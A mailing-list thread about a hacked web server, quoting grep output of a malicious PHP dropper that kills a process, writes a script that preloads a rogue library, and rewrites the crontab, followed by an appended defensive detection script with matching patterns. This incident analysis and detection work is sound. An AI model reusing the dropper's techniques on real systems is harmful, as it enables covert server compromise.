[BlueOnyx:17919] Re: 5106R cfsadmin load issue

Gerald Waugh gwaugh at frontstreetnetworks.com
Sat Jun 27 13:23:07 -05 2015


On 06/27/2015 12:49 PM, Michael Stauber wrote:
> Hi Gerald,
>
>> OK here is the hack
>> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@system("killall -9 ".basename("*/usr/bin/host*"));
>> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$f = fopen("/usr/bin/host", "rb");
>> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$HBN=basename("*/usr/bin/host*");
>> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
> Nice catch. :o)
>
> But I had to say it: The default security settings of PHP do not allow
> PHP scripts to use system() calls. Apparently it was allowed for this
> site and that allowed the scripts to do their malicious job.
>
> Might be a good idea to disallow system() calls again on that box.
>
OK, thanks
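An added example, not code from this thread or from the BlueOnyx project: a POSIX sh script that hunts for the indicators visible in the grep output quoted above (a PHP file that shells out and drops 1.sh, a cron entry that re-launches 1.sh, and a running process with libworker.so mapped via LD_PRELOAD) and then checks whether a php.ini's disable_functions line actually covers system(), which is the setting PHP uses to refuse system() calls. Paths are taken as arguments because the per-site php.ini location on a 5106R is not stated in the thread; the evidence tree built by make_sample is constructed for demonstration and only echoes the fingerprints shown above.

```shell
#!/bin/sh
# Added example (not from the thread). Each check is a function taking its
# input as an argument, so it works on a copied evidence tree as well as on
# the live host. make_sample builds a constructed tree for a dry run.

# A crontab listing (output of `crontab -l`) that re-launches the dropper's
# 1.sh. $1 = file holding that listing.
cron_has_dropper() {
    grep -q '1\.sh' "$1"
}

# PHP files under a web root that carry the dropper's fingerprints:
# the LD_PRELOAD export, the libworker.so payload, or the killall used to
# replace an already running host. Prints matching paths, one per line.
find_php_droppers() {
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'LD_PRELOAD=|libworker\.so|killall -9' {} + 2>/dev/null || true
}

# Processes that currently have libworker.so mapped, i.e. a host started
# with the preload. $1 = a /proc root, so a snapshot can be checked offline.
find_preloaded_pids() {
    for maps in "$1"/[0-9]*/maps; do
        [ -r "$maps" ] || continue
        grep -q 'libworker\.so' "$maps" && basename "$(dirname "$maps")"
    done
    return 0
}

# Does this php.ini disable system()? PHP honours the last disable_functions
# line it parses, so only that one is inspected. $1 = ini file.
php_blocks_system() {
    grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$1" \
        | tail -n 1 | grep -qw system
}

# Constructed evidence tree under $1: one infected site, one clean site, two
# crontab listings, a two-process /proc snapshot, and a weak vs. hardened ini.
make_sample() {
    root=$1
    mkdir -p "$root/web/infected/wp-includes/images/crystal" \
             "$root/web/clean" "$root/proc/1" "$root/proc/4242"
    # stand-in for the dropper, reduced to the lines quoted in the thread
    cat > "$root/web/infected/wp-includes/images/crystal/system.php" <<'EOF'
<?php
@system("killall -9 ".basename("/usr/bin/host"));
@file_put_contents("1.sh", "#!/bin/sh\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\n");
EOF
    printf '<?php echo "hello";\n' > "$root/web/clean/index.php"
    # constructed crontab listings: with and without the re-launch entry
    printf '* * * * * /bin/sh /home/.sites/137/site42/web/wp-includes/images/crystal/1.sh\n0 3 * * * /usr/sbin/logrotate\n' > "$root/crontab.txt"
    printf '0 3 * * * /usr/sbin/logrotate\n' > "$root/crontab-clean.txt"
    # constructed /proc maps: pid 4242 is a host with the payload preloaded
    printf '7f0000000000-7f0000001000 r-xp 00000000 08:01 1 /home/.sites/137/site42/web/wp-includes/images/crystal/libworker.so\n' > "$root/proc/4242/maps"
    printf '7f0000000000-7f0000001000 r-xp 00000000 08:01 2 /usr/lib64/libc.so.6\n' > "$root/proc/1/maps"
    # php.ini as found (system() allowed) and as it should be
    printf 'disable_functions =\n' > "$root/php-weak.ini"
    printf 'disable_functions = exec,passthru,shell_exec,system,proc_open,popen\n' > "$root/php-hard.ini"
}

# Dry run against the constructed tree.
main() {
    tmp=$(mktemp -d)
    make_sample "$tmp"
    echo "PHP droppers:";        find_php_droppers "$tmp/web"
    echo "cron re-launch entry:"; cron_has_dropper "$tmp/crontab.txt" && echo yes
    echo "pids with libworker.so mapped:"; find_preloaded_pids "$tmp/proc"
    echo "system() blocked by php-weak.ini:"; php_blocks_system "$tmp/php-weak.ini" && echo yes || echo no
    echo "system() blocked by php-hard.ini:"; php_blocks_system "$tmp/php-hard.ini" && echo yes || echo no
    rm -rf "$tmp"
}
main
```

On a live box the arguments would be the site's web root, the output of `crontab -l` for the site user, the real /proc, and whichever php.ini the site actually loads. Note what the quoted 1.sh does: it kills the running host, restarts it with LD_PRELOAD, then strips its own line out of the crontab and deletes itself. Disabling system() stops the PHP dropper from doing that again, but it does nothing to a host that is already running with the payload mapped, so the /proc and crontab checks matter as much as the php.ini one.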